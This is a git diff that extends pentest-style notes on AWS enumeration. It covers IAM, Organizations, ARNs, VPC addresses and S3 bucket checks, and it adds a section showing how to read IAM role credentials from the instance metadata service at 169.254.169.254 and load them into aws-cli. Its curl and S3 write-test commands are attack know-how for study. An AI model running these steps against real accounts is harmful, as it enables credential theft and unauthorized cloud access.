diff --git a/Enumeration/AWS.md b/Enumeration/AWS.md index 99ae850..c59268e 100644 --- a/Enumeration/AWS.md +++ b/Enumeration/AWS.md @@ -33,7 +33,8 @@ or http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext ``` -* __List content of public bucket via__ +### List content of public bucket via + ```sh aws s3 ls s3:/// --no-sign-request ``` @@ -51,9 +52,10 @@ If the ACL is set to * `Anyone`, just `curl` * `AuthenticatedUsers`, `s3` cli with aws key -## IAM +## Identity Access Management (IAM) -Permissions are granted directly through user accounts or indirectly through +Permissions are granted directly through IAM identities (IAM Principals) inside +an AWS account or indirectly through roles the user has joined. Policy evaluation @@ -75,7 +77,7 @@ and authorization. Every AWS account has a single root account bound to an email address. This account has got the all privileges over the account. A root account has MFA -disabled by default. +disabled by default. Has all permissions except Organizational Service Control Policies. The account is susceptible to an attack if the mail address is accessible but MFA is not activated. @@ -83,11 +85,13 @@ MFA is not activated. If the MFA is not set, it is an opportunity for a password reset attack when the account the vulnerable root belongs to is part of an AWS Organization. -### User Policies +### (User) Policies After authentication of a user (or principal) policies of the account are checked if the request is allowed. Policy evaluation can be found in the [AWS docs](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic.html). +A policy may also be attached to a resource. + The following graph is taken from the documentation, it shows the evaluation logic inside an account @@ -96,6 +100,27 @@ logic inside an account Policies like `assume-role` and `switch-role` can lead to the gain of roles with higher permissions +## AWS Organizations + +An organization is a tree structure, made out of a single root account and +Organizational Units (UOs). UOs can have children UOs. AN UO may contain +multiple AWS accounts. An AWS account can contain multiple user accounts. + +An organization has IAM and SSO that also works with external identity +Providers (idP). This is done through the AWS IAM Identity Center which is used +to confiure roles and permissions. + +Further, there is a management account inside any organization. It owns the +role "OrganizationAccountAccessRole". This account uses the policies/roles +mentioned in the [User Policies](#User-Policies) which are `assume-role` and +`switch-role` on the cli tool and the management web-console to gain +administrative permissions over the UOs inside the organization. + +By default the Service Control Policy (SCP) `p-full-access` it attached to +every account inside the organization. This SCP allows subscription to all AWS +services. An account can have 5 SCPs at max. Limiting SCPs do not apply to the +management account itself. + ### User Provisioning When using the cli command, the aws configuration and credentials are stored at `~/.aws` @@ -136,9 +161,12 @@ In another region aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME ``` -### AWS ARN +### Amazon Resource Name (ARN) -Unique ID is create through the following scheme +The [ARN](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html) +is a unique ID which identifies resources. + +A Unique ID is create through the following scheme ```sh arn:aws::::/ @@ -159,3 +187,72 @@ Do a `PUT` method to see if the bucket may be writeable to upload a file via ```sh curl -vvv -X PUT $BUCKET_URL --data "Test of write permissions" ``` + +## Virtual Private Cloud (VPC) + +Is a logic network segementation method using its own IP address range. +Contains resources like VMs (EC2) and has an Internet gateway if needed. The +gateway can be either just ingress, egress, or both. EC2 can use elastic IP +addresses to provide Ingress. A Gateway Load Balancer can be used to do traffic inspection. + +To connect to a VPC, it does not need to be exposed to the Internet. It is +accessible through various connection services like Direct Connect or +PrivateLink. + +VPCs can have multiple subnets, they use host infrastructure components like +DHCP, NTP and DNS provided by AWS. + +NTP can be found under 169.254.169.123. The DNS resolver `Route 53` can be +found under 169.254.169.253. Microsoft's KMS service can be at 169.254.169.250 +and 169.254.169.251. + +### Metadata Service + +The instance (Openstack) Metadata service can be found under 169.254.169.254. +It can be used +to gain information about the EC2 via a GET request to +http://169.254.169.254/latest/meta-data . + +The task metadata service can be found at 169.254.170.2 and is used for the +Elastic Container Service (ECS). + +The instance metadata service has been used for information disclosure of +security credentials before. +[Alexander +Hose](https://alexanderhose.com/how-to-hack-aws-instances-with-the-metadata-service-enabled/) +describes how to use the credentials through aws-cli. + +```sh +[ec2-user ~] curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ +ec2S3FullAccess +[ec2-user ~] curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2S3FullAccess +{ + "Code": "Success", + "LastUpdated": "2022-10-01T15:19:43Z", + "Type": "AWS-HMAC", + "AccessKeyId": "ASIAMFKOAUSJ7EXAMPLE", + "SecretAccessKey": "UeEevJGByhEXAMPLEKEY", + "Token": "TQijaZw==", + "Expiration": "2022-10-01T21:44:45Z" +} +``` + +Use the credentials to configure aws-cli. + +```sh +$ aws configure +AWS Access Key ID [None]: ASIAMFKOAUSJ7EXAMPLE +AWS Secret Access Key [None]: UeEevJGByhEXAMPLEKEYEXAMPLEKEY +Default region name [None]: us-east-2 +Default output format [None]: json +``` + +Add the credentials to the AWS credentials file + +```sh +[default] +aws_access_key_id = ASIAMFKOAUSJ7EXAMPLE +aws_secret_access_key = UeEevJGByhEXAMPLEKEYEXAMPLEKEY +aws_session_token = TQijaZw== +``` +